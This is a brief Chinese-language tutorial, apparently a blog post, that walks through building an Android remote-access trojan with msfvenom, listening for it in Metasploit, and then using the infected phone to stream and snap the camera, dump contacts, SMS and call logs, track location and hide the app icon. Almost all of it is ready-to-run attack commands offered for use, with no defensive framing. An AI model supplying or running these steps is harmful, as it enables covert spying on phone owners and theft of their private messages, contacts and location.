1.查看kali的IP
2.輸入生成反彈木馬命令:
msfvenom -p Android/meterpreter/reverse_tcp lhost=192.168.21.128 lport=55555 R > /home/1.apk
3.啟動msfconsole,配置相關參數
msfconsole //啟動msfconsole
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.21.128 //這里的地址設置成我們剛才生成木馬的IP地址
set lport 55555 //這里的端口設置成剛才我們生成木馬所監聽的端口
exploit //開始執行漏洞 開始監聽,等待手機上線
4.將1.apk上傳至手機,并且安裝運行
5.查看手機信息
sysinfo
6.查看手機有多少個攝像頭
webcam_list
7.開啟攝像頭
webcam_stream
8.導出電話號碼
dump_contacts
9.導出短信信息
dump_sms
10.通過攝像頭拍照功能
webcam_snap
11.其他命令
hide_App_icon //隱藏手機端木馬程序圖標
dump_calllog //獲取通話記錄
geolocate //獲取手機的當前的經緯度
set_audio_mode //Set Ringer Mode
sqlite_query //Query a SQLite database from storage
wakelock // Enable/Disable Wakelock
wlan_geolocate // Get current lat-long using WLAN information
app_install // Request to install apk file
app_list // List installed apps in the device
app_run // Start Main Activty for package name
app_uninstall //Request to uninstall application
OK,就分享至此,其他命令請自行研究!